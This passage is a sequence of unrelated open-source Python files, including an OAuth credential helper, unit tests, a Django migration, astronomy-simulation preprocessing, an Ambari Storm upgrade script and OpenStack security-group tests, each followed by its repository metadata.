# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authenticates user for accessing the ISB-CGC Endpoint APIs.
#
# May be run from the command line or in scripts/ipython.
#
# The credentials file can be copied to any machine from which you want
# to access the API.
#
# 1. Command Line
# python ./isb_auth.py saves the user's credentials;
# OPTIONAL:
# -v for verbose (returns token!)
# -s FILE sets credentials file [default: ~/.isb_credentials]
# -u URL-only: for use over terminal connections;
# gives user a URL to paste into their browser,
# and asks for an auth code in return
#
# 2. Python
# import isb_auth
# isb_auth.get_credentials()
#
# # optional: to store credentials in a different location
# from oauth2client.file import Storage
# import isb_auth
# import os
#
# storage_file = os.path.join(os.path.expanduser("~"), "{USER_CREDENTIALS_FILE_NAME}")
# storage = Storage(storage_file)
# isb_auth.get_credentials(storage=storage)
#
from __future__ import print_function
from argparse import ArgumentParser
import os
from oauth2client.client import OAuth2WebServerFlow
from oauth2client import tools
from oauth2client.file import Storage
# Module-level verbosity flag; set from the --verbose option in main().
VERBOSE = False
# for native application - same as settings.INSTALLED_APP_CLIENT_ID
CLIENT_ID = '586186890913-atr969tu3lf7u574khjjplb45fgpq1bg.apps.googleusercontent.com'
# NOTE: this is NOT actually a 'secret' -- we're using the 'installed
# application' OAuth pattern here
CLIENT_SECRET = 'XeBxiK7NQ0yvAkAnRIKufkFE'
EMAIL_SCOPE = 'https://www.googleapis.com/auth/userinfo.email'
# Default on-disk location for stored OAuth credentials.
DEFAULT_STORAGE_FILE = os.path.join(os.path.expanduser("~"), '.isb_credentials')
def maybe_print(msg):
    """Print *msg* only when the module-level VERBOSE flag is set."""
    if not VERBOSE:
        return
    print(msg)
def get_credentials(storage=None, oauth_flow_args=None):
    """Return stored OAuth2 credentials, running the OAuth flow if needed.

    Args:
      storage: oauth2client Storage object; defaults to a Storage backed
        by DEFAULT_STORAGE_FILE in the user's home directory.
      oauth_flow_args: optional list of extra command-line style flags for
        the OAuth flow (e.g. '--noauth_local_webserver').

    Returns:
      An oauth2client credentials object.
    """
    # Bug fix: the previous signature used a mutable default argument
    # (oauth_flow_args=[]) and appended to it, so the appended flag was
    # shared across calls and mutated the caller's list.  Copy instead.
    oauth_flow_args = list(oauth_flow_args) if oauth_flow_args else []
    noweb = '--noauth_local_webserver'
    # When used as a library, never try to spawn a local web server.
    if __name__ != '__main__' and noweb not in oauth_flow_args:
        oauth_flow_args.append(noweb)
    if storage is None:
        storage = Storage(DEFAULT_STORAGE_FILE)
    credentials = storage.get()
    if not credentials or credentials.invalid:
        maybe_print('credentials missing/invalid, kicking off OAuth flow')
        flow = OAuth2WebServerFlow(CLIENT_ID, CLIENT_SECRET, EMAIL_SCOPE)
        # Force the approval prompt so a refresh token is always issued.
        flow.auth_uri = flow.auth_uri.rstrip('/') + '?approval_prompt=force'
        credentials = tools.run_flow(flow, storage, tools.argparser.parse_args(oauth_flow_args))
    return credentials
def main():
    """Command-line entry point: parse options and store credentials."""
    global VERBOSE
    args = parse_args()
    # Forward the --noauth_local_webserver flag to the OAuth flow, if given.
    oauth_flow_args = [args.noauth_local_webserver] if args.noauth_local_webserver else []
    VERBOSE = args.verbose
    maybe_print('--verbose: printing extra information')
    storage = Storage(args.storage_file)
    credentials = get_credentials(storage, oauth_flow_args)
    maybe_print('credentials stored in ' + args.storage_file)
    maybe_print('access_token: ' + credentials.access_token)
    maybe_print('refresh_token: ' + credentials.refresh_token)
def parse_args():
    """Build the command-line parser and parse sys.argv."""
    parser = ArgumentParser()
    parser.add_argument(
        '--storage_file', '-s', default=DEFAULT_STORAGE_FILE,
        help='storage file to use for the credentials (default is {})'.format(DEFAULT_STORAGE_FILE))
    parser.add_argument(
        '--verbose', '-v', dest='verbose', action='store_true',
        help='display credentials storage location, access token, and refresh token')
    parser.add_argument(
        '--noauth_local_webserver', '-u', action='store_const',
        const='--noauth_local_webserver')
    parser.set_defaults(verbose=False)
    return parser.parse_args()
# Run the credential flow when invoked as a script.
if __name__ == '__main__':
    main()
# -*- coding: utf-8 -*-
import unittest
from framework import TestCase
from earth.tag import Tag
class TestTagCase(TestCase):
    """CRUD round-trip tests for the Tag model."""

    def test_tag(self):
        # ADD
        tag_name = '娱乐'
        tag = Tag.add(name=tag_name)
        assert tag_name == tag.name
        assert hasattr(tag, 'id')
        # GET: lookup by id and by name must return the same row
        tag_get = Tag.get(tag.id)
        tag_by_name = Tag.get_by_name(tag_name)
        assert tag_get == tag
        assert tag_by_name == tag
        # UPDATE: a rename is only persisted after update() is called
        new_tag_name = '不娱乐'
        tag.name = new_tag_name
        assert Tag.get_by_name(tag_name)
        tag.update()
        assert not Tag.get_by_name(tag_name)
        assert Tag.get_by_name(new_tag_name)
        # DELETE
        tag.delete()
        assert Tag.get(tag.id) == None
        assert Tag.get_by_name(new_tag_name) == None

    def test_tag_gets(self):
        # Adding a duplicate name must return a falsy value.
        name_cry = '哭死了'
        tag_cry = Tag.add(name=name_cry)
        assert not Tag.add(name=name_cry)
        name_laugh = '笑死了'
        tag_laugh = Tag.add(name=name_laugh)
        # gets() must preserve the order of the requested ids.
        tags = Tag.gets([tag_cry.id, tag_laugh.id])
        assert [tag_cry, tag_laugh] == tags
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| tottily/terabithia | monster/test_tag.py | Python | apache-2.0 | 1,202 |
#!/usr/bin/env python
import gtk
class FontSelectionDialog(gtk.FontSelectionDialog):
    """PyGTK font-selection dialog that prints the chosen font (Python 2)."""

    def __init__(self):
        gtk.FontSelectionDialog.__init__(self, title=None)
        self.set_title("FontSelectionDialog")
        self.connect("response", self.on_response)

    def on_response(self, dialog, response):
        # Print the selection only when the user confirmed with OK,
        # then close the dialog either way.
        if response == gtk.RESPONSE_OK:
            print "Font selected:", self.get_font_name()
        self.destroy()
# Show the dialog and block until the user responds.
dialog = FontSelectionDialog()
dialog.run()
| Programmica/pygtk-tutorial | examples/fontselectiondialog.py | Python | cc0-1.0 | 479 |
# Generated by Django 2.0.4 on 2018-06-14 23:03
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: adds Ticket.cleared_at and extends the
    # status choices with the CLEARED_* states.

    dependencies = [
        ('tickets', '0005_auto_20180430_1931'),
    ]

    operations = [
        migrations.AddField(
            model_name='ticket',
            name='cleared_at',
            field=models.DateTimeField(null=True),
        ),
        migrations.AlterField(
            model_name='ticket',
            name='status',
            # NOTE(review): the choice values are strings ('0'..'3') on an
            # IntegerField with an integer default -- this mirrors the
            # model definition but looks inconsistent; confirm upstream.
            field=models.IntegerField(choices=[('1', 'ACK'), ('3', 'CLEARED_ACK'), ('2', 'CLEARED_UNACK'), ('0', 'UNACK')], default=0),
        ),
    ]
| IntegratedAlarmSystem-Group/ias-webserver | tickets/migrations/0006_auto_20180614_2303.py | Python | lgpl-3.0 | 626 |
from unittest import TestCase
from safepickle.types.tuple import TupleType
from safepickle.encoding import encode, decode
class TestTuple(TestCase):
    def test_tuple(self):
        """ Asserts tuple type is handled as expected
        """
        obj = (1, 2)
        type_ = TupleType()
        # Encode with TupleType, decode generically: the round trip must
        # reproduce the original tuple (same type and contents).
        encoding = type_.encode(obj, encode)
        decoding = decode(encoding)
        self.assertEqual(obj, decoding)
| nioinnovation/safepickle | safepickle/types/tests/test_tuple.py | Python | apache-2.0 | 416 |
#!/usr/bin/python
"""Perform preprocessing and generate raytrace exec scripts for one focal plane.
For documentation using the python_control for ImSim/PhoSim version <= v.3.0.x,
see README.v3.0.x.txt.
For documentation using the python_control for ImSim/PhoSim version == v.3.2.x,
see README.txt.
The behavior of this script differs depending on the version of ImSim/PhoSim.
For versions <= v3.0.x, it functions like the original fullFocalplane.py and
calls AllChipsScriptGenerator.makeScripts() to generate a script and some tarballs
that can in turn be executed to run the preprocessing step (which in turn calls
AllChipsScriptGenerator) to generate shells scripts and tarballs for performing
the raytrace stage. See README.v3.0.x.txt for more info.
The behavior for ImSim/PhoSim version == 3.2.x is to run the preprocessing step
directly through the class PhosimManager.PhosimPrepreprocessor (which in turn
calls phosim.py in the phosin.git repository). After the preprocessing is
complete, PhosimPreprocessor generates shell scripts for the raytrace phase.
A few notes on options:
--skip_atmoscreens: Use this to optionally skip the step to generate atmosphere
screens during preprocessing and instead perform this
operation at the start of the raytrace phase. This is
useful in distributed environments where the cost of
transferring the atmosphere screens to the compute node
is higher than recalculating them.
--logtostderr: (only v3.2.x and higher) By default, log output from python_controls
is done via the python logging module, and directed to either
log_dir in the imsim_config_file or /tmp/fullFocalplane.log
if log_dir is not specified. This option overrides this behavior
and prints logging information to stdout. Note: output from
phosim.py and the phosim binaries are still printed to stdout.
TODO(gardnerj): Add stdout log redirect
TODO(gardnerj): Support sensor_ids argument for phosim.py.
TODO(gardnerj): Support not running e2adc step.
"""
from __future__ import with_statement
import ConfigParser
from distutils import version
import logging
from optparse import OptionParser # Can't use argparse yet, since we must work in 2.5
import os
import sys
from AllChipsScriptGenerator import AllChipsScriptGenerator
import PhosimManager
import PhosimUtil
import PhosimVerifier
import ScriptWriter
__author__ = 'Jeff Gardner (gardnerj@phys.washington.edu)'
logger = logging.getLogger(__name__)
def DoPreprocOldVersion(trimfile, policy, extra_commands, scheduler, sensor_id):
    """Do preprocessing for v3.1.0 and earlier.

    Args:
      trimfile: Full path to trim metadata file.
      policy: ConfigParser object from python_controls config file.
      extra_commands: Full path to extra commands or 'extraid' file.
      scheduler: Name of scheduler (currently, just 'csh' is supported).
      sensor_id: If not '', run just this single sensor ID.

    Returns:
      0 (success)
    """
    with PhosimUtil.WithTimer() as t:
        # Determine the pre-processing scheduler so that we know which class to use
        if scheduler == 'csh':
            scriptGenerator = AllChipsScriptGenerator(trimfile, policy, extra_commands)
            scriptGenerator.makeScripts(sensor_id)
        elif scheduler == 'pbs':
            # NOTE(review): AllChipsScriptGenerator_Pbs is not imported in
            # this module, so this branch would raise NameError -- confirm
            # where it is expected to come from.
            scriptGenerator = AllChipsScriptGenerator_Pbs(trimfile, policy, extra_commands)
            scriptGenerator.makeScripts(sensor_id)
        elif scheduler == 'exacycle':
            print 'Exacycle funtionality not added yet.'
            return 1
        else:
            print 'Scheduler "%s" unknown. Use -h or --help for help.' % scheduler
    t.LogWall('makeScripts')
    return 0
def DoPreproc(trimfile, imsim_config_file, extra_commands, scheduler,
              skip_atmoscreens=False, keep_scratch_dirs=False):
    """Do preprocessing for v3.2.0 and later.

    Args:
      trimfile: Full path to trim metadata file.
      imsim_config_file: Full path to the python_controls config file.
      extra_commands: Full path to extra commands or 'extraid' file.
      scheduler: Name of scheduler (currently, just 'csh' is supported).
      skip_atmoscreens: Generate atmosphere screens in raytrace stage instead
                        of preprocessing stage.
      keep_scratch_dirs: Do not delete the working directories at the end of
                         execution.

    Returns:
      0 upon success, 1 upon failure.
    """
    if scheduler == 'csh':
        preprocessor = PhosimManager.Preprocessor(imsim_config_file,
                                                  trimfile, extra_commands)
    elif scheduler == 'pbs':
        # Construct PhosimPreprocessor with PBS-specific ScriptWriter
        preprocessor = PhosimManager.Preprocessor(
            imsim_config_file, trimfile, extra_commands,
            script_writer_class=ScriptWriter.PbsRaytraceScriptWriter)
        # Read in PBS-specific config
        policy = ConfigParser.RawConfigParser()
        policy.read(imsim_config_file)
        preprocessor.script_writer.ParsePbsConfig(policy)
    else:
        logger.critical('Unknown scheduler: %s. Use -h or --help for help',
                        scheduler)
        return 1
    preprocessor.InitExecEnvironment()
    with PhosimUtil.WithTimer() as t:
        if not preprocessor.DoPreprocessing(skip_atmoscreens=skip_atmoscreens):
            logger.critical('DoPreprocessing() failed.')
            return 1
    t.LogWall('DoPreprocessing')
    exec_manifest_fn = 'execmanifest_raytrace_%s.txt' % preprocessor.focalplane.observationID
    files_to_stage = preprocessor.ArchiveRaytraceInputByExt(exec_archive_name=exec_manifest_fn)
    if not files_to_stage:
        logger.critical('Output archive step failed.')
        return 1
    with PhosimUtil.WithTimer() as t:
        preprocessor.StageOutput(files_to_stage)
    t.LogWall('StageOutput')
    if not keep_scratch_dirs:
        preprocessor.Cleanup()
    verifier = PhosimVerifier.PreprocVerifier(imsim_config_file, trimfile,
                                              extra_commands)
    missing_files = verifier.VerifySharedOutput()
    if missing_files:
        logger.critical('Verification failed with the following files missing:')
        for fn in missing_files:
            logger.critical(' %s', fn)
        sys.stderr.write('Verification failed with the following files missing:\n')
        for fn in missing_files:
            # Bug fix: file.write() takes a single string argument; the old
            # code passed (' %s\n', fn) which raises TypeError.
            sys.stderr.write(' %s\n' % fn)
    else:
        logger.info('Verification completed successfully.')
    return 0
def ConfigureLogging(trimfile, policy, log_to_stdout, imsim_config_file,
                     extra_commands=None):
    """Configures logger.

    If log_to_stdout, the logger will write to stdout. Otherwise, it will
    write to:
       'log_dir' in the config file, if present
       /tmp/fullFocalplane.log if 'log_dir' is not present.

    Stdout from phosim.py and PhoSim binaries always goes to stdout.
    """
    if log_to_stdout:
        log_fn = None
    else:
        if policy.has_option('general', 'log_dir'):
            # Log to file in log_dir, one subdirectory per observation ID.
            # Bug fix: this used to read 'options.extra_commands', but no
            # global 'options' exists in this module (NameError); use the
            # 'extra_commands' parameter instead.
            obsid, filter_num = PhosimManager.ObservationIdFromTrimfile(
                trimfile, extra_commands=extra_commands)
            log_dir = os.path.join(policy.get('general', 'log_dir'), obsid)
            log_fn = os.path.join(log_dir, 'fullFocalplane_%s.log' % obsid)
        else:
            log_fn = '/tmp/fullFocalplane.log'
    PhosimUtil.ConfigureLogging(policy.getint('general', 'debug_level'),
                                logfile_fullpath=log_fn)
    params_str = 'trimfile=%s\nconfig_file=%s\n' % (trimfile, imsim_config_file)
    if extra_commands:
        params_str += 'extra_commands=%s\n' % extra_commands
    PhosimUtil.WriteLogHeader(__file__, params_str=params_str)
def main(trimfile, imsim_config_file, extra_commands, skip_atmoscreens,
         keep_scratch_dirs, sensor_ids, log_to_stdout=False):
  """
  Run the fullFocalplanePbs.py script, populating it with the
  correct user and cluster job submission information from an LSST
  policy file.

  Returns:
    0 on success, 1 on failure (suitable for sys.exit()).
  """
  policy = ConfigParser.RawConfigParser()
  policy.read(imsim_config_file)
  if policy.has_option('general', 'phosim_version'):
    phosim_version = policy.get('general', 'phosim_version')
  else:
    # Default to the oldest supported release when not configured.
    phosim_version = '3.0.1'
  ConfigureLogging(trimfile, policy, log_to_stdout,
                   imsim_config_file, extra_commands)
  logger.info('Running fullFocalPlane on: %s ', trimfile)
  logger.info('Using Imsim/Phosim version %s', phosim_version)
  # Must pass absolute paths to imsim/phosim workers
  if not os.path.isabs(trimfile):
    trimfile = os.path.abspath(trimfile)
  if not os.path.isabs(imsim_config_file):
    imsim_config_file = os.path.abspath(imsim_config_file)
  if not os.path.isabs(extra_commands):
    extra_commands = os.path.abspath(extra_commands)
  scheduler = policy.get('general', 'scheduler2')
  if version.LooseVersion(phosim_version) < version.LooseVersion('3.1.0'):
    if len(sensor_ids.split('|')) > 1:
      logger.critical('Multiple sensors not supported in version < 3.1.0.')
      return 1
    sensor_id = '' if sensor_ids == 'all' else sensor_ids
    # BUG FIX: was 'extra_commandsm' (NameError at runtime on this path).
    return DoPreprocOldVersion(trimfile, policy, extra_commands, scheduler,
                               sensor_id)
  elif version.LooseVersion(phosim_version) > version.LooseVersion('3.2.0'):
    if sensor_ids != 'all':
      logger.critical('Single exposure mode is currently not supported for'
                      ' phosim > 3.2.0')
      return 1
    return DoPreproc(trimfile, imsim_config_file, extra_commands, scheduler,
                     skip_atmoscreens=skip_atmoscreens,
                     keep_scratch_dirs=keep_scratch_dirs)
  # Versions in the [3.1.0, 3.2.0] range are not handled by either branch.
  logger.critical('Unsupported phosim version %s', phosim_version)
  return 1
if __name__ == '__main__':
  # Command-line entry point: parse options, then delegate to main().
  usage = 'usage: %prog trimfile imsim_config_file [options]'
  parser = OptionParser(usage=usage)
  parser.add_option('-a', '--skip_atmoscreens', dest='skip_atmoscreens',
                    action='store_true', default=False,
                    help='Generate atmospheric screens in raytrace stage instead'
                    ' of preprocessing stage.')
  parser.add_option('-c', '--command', dest='extra_commands',
                    help='Extra commands filename.')
  parser.add_option('-k', '--keep_scratch', dest='keep_scratch_dirs',
                    action='store_true', default=False,
                    help='Do not cleanup working directories.'
                    ' (version 3.2.x and higher only).')
  parser.add_option('-l', '--logtostdout', dest='log_to_stdout',
                    action='store_true', default=False,
                    help='Write logging output to stdout instead of log file'
                    ' (version 3.2.x and higher only).')
  parser.add_option('-s', '--sensor', dest='sensor_ids', default='all',
                    help='Specify a list of sensor ids to use delimited by "|",'
                    ' or use "all" for all.')
  (options, args) = parser.parse_args()
  # Exactly two positional arguments are required: trimfile and config file.
  if len(args) != 2:
    print 'Incorrect number of arguments. Use -h or --help for help.'
    print usage
    quit()
  trimfile = args[0]
  imsim_config_file = args[1]
  # Exit status is main()'s return value (0 = success, 1 = failure).
  sys.exit(main(trimfile, imsim_config_file, options.extra_commands,
                options.skip_atmoscreens, options.keep_scratch_dirs,
                options.sensor_ids, options.log_to_stdout))
| lsst-sims/sims_phosim_pythoncontrol | fullFocalplane.py | Python | gpl-3.0 | 11,426 |
from syncloudlib.linux import useradd
def test_useradd():
    """Trivial placeholder test.

    Presumably exists so the module-level import of
    syncloudlib.linux.useradd is exercised at collection time — confirm.
    """
    assert True
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import ambari_simplejson as json # simplejson is much faster comparing to Python 2.6 json module and has the same functions set.
import os
from ambari_commons import yaml_utils
from resource_management.core.logger import Logger
from resource_management.core.exceptions import Fail
from resource_management.core.resources.system import Directory
from resource_management.core.resources.system import File
from resource_management.core.resources.system import Execute
from resource_management.libraries.script.script import Script
from resource_management.libraries.functions.default import default
class StormUpgrade(Script):
  """
  This class helps perform some of the upgrade tasks needed for Storm during
  a non-rolling upgrade. Storm writes data to disk locally and to ZooKeeper.
  If any HDP 2.2 bits exist in these directories when an HDP 2.3 instance
  starts up, it will fail to start properly. Because the upgrade framework in
  Ambari doesn't yet have a mechanism to say "stop all" before starting to
  upgrade each component, we need to rely on a Storm trick to bring down
  running daemons. By removing the ZooKeeper data with running daemons, those
  daemons will die.
  """

  def delete_storm_zookeeper_data(self, env):
    """
    Deletes the Storm data from ZooKeeper, effectively bringing down all
    Storm daemons.

    :param env: execution environment supplied by the Ambari agent
    :raises Fail: if storm.zookeeper.root is not configured, or if the data
      could not be removed from any of the configured ZooKeeper hosts.
    :return: None
    """
    import params
    Logger.info('Clearing Storm data from ZooKeeper')
    storm_zookeeper_root_dir = params.storm_zookeeper_root_dir
    if storm_zookeeper_root_dir is None:
      raise Fail("The storm ZooKeeper directory specified by storm-site/storm.zookeeper.root must be specified")
    # the zookeeper client must be given a zookeeper host to contact
    storm_zookeeper_server_list = yaml_utils.get_values_from_yaml_array(params.storm_zookeeper_servers)
    if storm_zookeeper_server_list is None:
      # BUG FIX: .format() was previously called on the return value of
      # Logger.info() (which is None), raising AttributeError; format the
      # message string itself instead.
      Logger.info("Unable to extract ZooKeeper hosts from '{0}', assuming localhost".format(params.storm_zookeeper_servers))
      storm_zookeeper_server_list = ["localhost"]
    # for every zk server, try to remove /storm
    zookeeper_data_cleared = False
    for storm_zookeeper_server in storm_zookeeper_server_list:
      # determine where the zkCli.sh shell script is
      zk_command_location = "/usr/hdp/current/zookeeper-client/bin/zkCli.sh"
      if params.version is not None:
        zk_command_location = "/usr/hdp/{0}/zookeeper/bin/zkCli.sh".format(params.version)
      # create the ZooKeeper delete command
      command = "{0} -server {1}:{2} rmr /storm".format(
        zk_command_location, storm_zookeeper_server, params.storm_zookeeper_port)
      # clean out ZK
      try:
        # the ZK client requires Java to run; ensure it's on the path
        env_map = {
          'JAVA_HOME': params.java64_home
        }
        # AMBARI-12094: if security is enabled, then we need to tell zookeeper where the
        # JAAS file is located since we don't use kinit directly with STORM
        if params.security_enabled:
          env_map['JVMFLAGS'] = "-Djava.security.auth.login.config={0}".format(params.storm_jaas_file)
        Execute(command, user=params.storm_user, environment=env_map,
          logoutput=True, tries=1)
        zookeeper_data_cleared = True
        break
      except Exception:
        # The command failed; try the next ZK server. Narrowed from a bare
        # 'except:' so KeyboardInterrupt/SystemExit are no longer swallowed.
        pass
    # fail if the ZK data could not be cleared
    if not zookeeper_data_cleared:
      raise Fail("Unable to clear ZooKeeper Storm data on any of the following ZooKeeper hosts: {0}".format(
        storm_zookeeper_server_list))

  def delete_storm_local_data(self, env):
    """
    Deletes Storm data from local directories. This will create a marker file
    with JSON data representing the upgrade stack and request/stage ID. This
    will prevent multiple Storm components on the same host from removing
    the local directories more than once.

    :param env: execution environment supplied by the Ambari agent
    :raises Fail: if storm.local.dir is not configured.
    :return: None
    """
    import params
    Logger.info('Clearing Storm data from local directories...')
    storm_local_directory = params.local_dir
    if storm_local_directory is None:
      raise Fail("The storm local directory specified by storm-site/storm.local.dir must be specified")
    request_id = default("/requestId", None)
    stage_id = default("/stageId", None)
    stack_version = params.version
    stack_name = params.stack_name
    # Marker payload identifying this particular upgrade request/stage.
    json_map = {}
    json_map["requestId"] = request_id
    json_map["stageId"] = stage_id
    json_map["stackVersion"] = stack_version
    json_map["stackName"] = stack_name
    temp_directory = params.tmp_dir
    upgrade_file = os.path.join(temp_directory, "storm-upgrade-{0}.json".format(stack_version))
    if os.path.exists(upgrade_file):
      try:
        with open(upgrade_file) as file_pointer:
          existing_json_map = json.load(file_pointer)
        # Plain dict equality replaces the Python-2-only cmp() == 0 check;
        # the semantics are identical for dictionaries.
        if json_map == existing_json_map:
          Logger.info("The storm upgrade has already removed the local directories for {0}-{1} for request {2} and stage {3}".format(
            stack_name, stack_version, request_id, stage_id))
          # nothing else to do here for this as it appears to have already been
          # removed by another component being upgraded
          return
      except Exception:
        # Narrowed from bare 'except:'; corrupt marker files are removed.
        Logger.error("The upgrade file {0} appears to be corrupt; removing...".format(upgrade_file))
        File(upgrade_file, action="delete")
      else:
        # delete the upgrade file since it does not match
        File(upgrade_file, action="delete")
    # delete from local directory
    Directory(storm_local_directory, action="delete", recursive=True)
    # recreate storm local directory (0o755 is valid Python 2.6+ and 3.x,
    # unlike the old 0755 literal)
    Directory(storm_local_directory, mode=0o755, owner=params.storm_user,
      group=params.user_group, recursive=True)
    # the file doesn't exist, so create it
    with open(upgrade_file, 'w') as file_pointer:
      json.dump(json_map, file_pointer, indent=2)
if __name__ == "__main__":
  # Entry point invoked by the Ambari agent; Script.execute() dispatches to
  # the command method named in the agent's command JSON.
  StormUpgrade().execute()
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack.network.v2 import security_group
from openstack.network.v2 import security_group_rule
from openstack.tests.functional import base
class TestSecurityGroupRule(base.BaseFunctionalTest):
    # Fixture constants: an IPv4/TCP ingress rule on port 22.
    IPV4 = 'IPv4'
    PROTO = 'tcp'
    PORT = 22
    DIR = 'ingress'
    # IDs of the resources created in setUp (group and rule respectively).
    ID = None
    RULE_ID = None

    def setUp(self):
        """Create a uniquely-named security group plus one ingress rule."""
        super(TestSecurityGroupRule, self).setUp()
        self.NAME = self.getUniqueString()
        sot = self.conn.network.create_security_group(name=self.NAME)
        assert isinstance(sot, security_group.SecurityGroup)
        self.assertEqual(self.NAME, sot.name)
        self.ID = sot.id
        # The rule is attached to the group created above.
        rul = self.conn.network.create_security_group_rule(
            direction=self.DIR, ethertype=self.IPV4,
            port_range_max=self.PORT, port_range_min=self.PORT,
            protocol=self.PROTO, security_group_id=self.ID)
        assert isinstance(rul, security_group_rule.SecurityGroupRule)
        self.assertEqual(self.ID, rul.security_group_id)
        self.RULE_ID = rul.id

    def tearDown(self):
        """Delete the rule first, then the group (order matters)."""
        sot = self.conn.network.delete_security_group_rule(
            self.RULE_ID, ignore_missing=False)
        self.assertIsNone(sot)
        sot = self.conn.network.delete_security_group(
            self.ID, ignore_missing=False)
        self.assertIsNone(sot)
        super(TestSecurityGroupRule, self).tearDown()

    def test_find(self):
        """find_security_group_rule resolves the rule by its ID."""
        sot = self.conn.network.find_security_group_rule(self.RULE_ID)
        self.assertEqual(self.RULE_ID, sot.id)

    def test_get(self):
        """get_security_group_rule returns the rule with all its attributes."""
        sot = self.conn.network.get_security_group_rule(self.RULE_ID)
        self.assertEqual(self.RULE_ID, sot.id)
        self.assertEqual(self.DIR, sot.direction)
        self.assertEqual(self.PROTO, sot.protocol)
        self.assertEqual(self.PORT, sot.port_range_min)
        self.assertEqual(self.PORT, sot.port_range_max)
        self.assertEqual(self.ID, sot.security_group_id)

    def test_list(self):
        """The created rule appears in the security_group_rules listing."""
        ids = [o.id for o in self.conn.network.security_group_rules()]
        self.assertIn(self.RULE_ID, ids)
| ctrlaltdel/neutrinator | vendor/openstack/tests/functional/network/v2/test_security_group_rule.py | Python | gpl-3.0 | 2,605 |
import get,set,delete | ArnossArnossi/checkmate | checkmate/management/commands/props/__init__.py | Python | agpl-3.0 | 21 |
# neubot/handler.py
#
# Copyright (c) 2010-2012 Simone Basso <bassosimone@gmail.com>,
# NEXA Center for Internet & Society at Politecnico di Torino
#
# This file is part of Neubot <http://www.neubot.org/>.
#
# Neubot is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Neubot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Neubot. If not, see <http://www.gnu.org/licenses/>.
#
''' Handles poller events '''
# Adapted from neubot/net/stream.py
# Python3-ready: yes
from neubot.connector import Connector
from neubot.listener import Listener
from neubot import utils_net
class Handler(object):

    ''' Base class that receives poller events '''

    # Inspired by BitTorrent handle class

    def listen(self, endpoint, prefer_ipv6, sslconfig, sslcert):
        ''' Start listening at the given endpoint '''
        listening_sockets = utils_net.listen(endpoint, prefer_ipv6)
        if not listening_sockets:
            self.handle_listen_error(endpoint)
            return
        for listening_sock in listening_sockets:
            Listener(self, listening_sock, endpoint, sslconfig, sslcert)

    def handle_listen_error(self, endpoint):
        ''' Invoked when listen() fails '''

    def handle_listen(self, listener):
        ''' Invoked when a listener becomes active '''

    def handle_listen_close(self, listener):
        ''' Invoked when a listening socket is closed '''

    def handle_accept(self, listener, sock, sslconfig, sslcert):
        ''' Invoked when a connection has been accepted '''

    def handle_accept_error(self, listener):
        ''' Invoked when accept() fails '''

    def connect(self, endpoint, prefer_ipv6, sslconfig, extra):
        ''' Start connecting to the given endpoint '''
        return Connector(self, endpoint, prefer_ipv6, sslconfig, extra)

    def handle_connect_error(self, connector):
        ''' Invoked when connect() fails '''

    def handle_connect(self, connector, sock, rtt, sslconfig, extra):
        ''' Invoked when a connection attempt succeeded '''

    def handle_close(self, stream):
        ''' Invoked when a stream is closed '''
| neubot/neubot-client | neubot/handler.py | Python | gpl-3.0 | 2,381 |
from pathlib import Path
import pytest
import pylint.extensions.empty_comment as empty_comment
@pytest.fixture(scope="module")
def checker():
    """Checker class under test, consumed by the shared linter fixture."""
    return empty_comment.CommentChecker
@pytest.fixture(scope="module")
def enable():
    """Message symbols to enable for the run: only 'empty-comment'."""
    return ["empty-comment"]
@pytest.fixture(scope="module")
def disable():
    """Disable all other messages so output is isolated to the checker."""
    return ["all"]
def test_comment_base_case(linter):
    """Linting the fixture file flags empty comments on lines 2, 3, 5 and 7."""
    fixture_path = str(Path(__file__).parent / "data" / "empty_comment.py")
    linter.check([fixture_path])
    msgs = linter.reporter.messages
    expected_lines = (2, 3, 5, 7)
    assert len(msgs) == len(expected_lines)
    for msg, expected_line in zip(msgs, expected_lines):
        assert msg.symbol == "empty-comment"
        assert msg.msg == "Line with empty comment"
        assert msg.line == expected_line
| ruchee/vimrc | vimfiles/bundle/vim-python/submodules/pylint/tests/extensions/test_empty_comment.py | Python | mit | 781 |
#!/usr/bin/env python
import roslib
roslib.load_manifest('hri_api')
import math
from geometry_msgs.msg import Point
class GeomMath(object):
    """Static helpers for simple geometric comparisons between 3-D points.

    All methods take objects exposing ``x``, ``y`` and ``z`` attributes
    (e.g. geometry_msgs.msg.Point). The in-front/behind/left/right tests
    compare raw coordinates; presumably the ROS convention (+x forward,
    +y left) is assumed — confirm against callers.
    """

    @staticmethod
    def distance_between(p1, p2):
        """Return the Euclidean distance between points p1 and p2.

        BUG FIX: previously computed sqrt(p1.x*p2.x + p1.y*p2.y + p1.z*p2.z),
        i.e. the square root of the dot product, which is not a distance
        (it is 0 whenever either point is the origin, and can even take the
        sqrt of a negative number).
        """
        dx = p1.x - p2.x
        dy = p1.y - p2.y
        dz = p1.z - p2.z
        return math.sqrt(dx * dx + dy * dy + dz * dz)

    @staticmethod
    def is_infront_of(p1, p2):
        """Return True if p1 is in front of p2 (p1.x >= p2.x)."""
        return p1.x >= p2.x

    @staticmethod
    def is_behind(p1, p2):
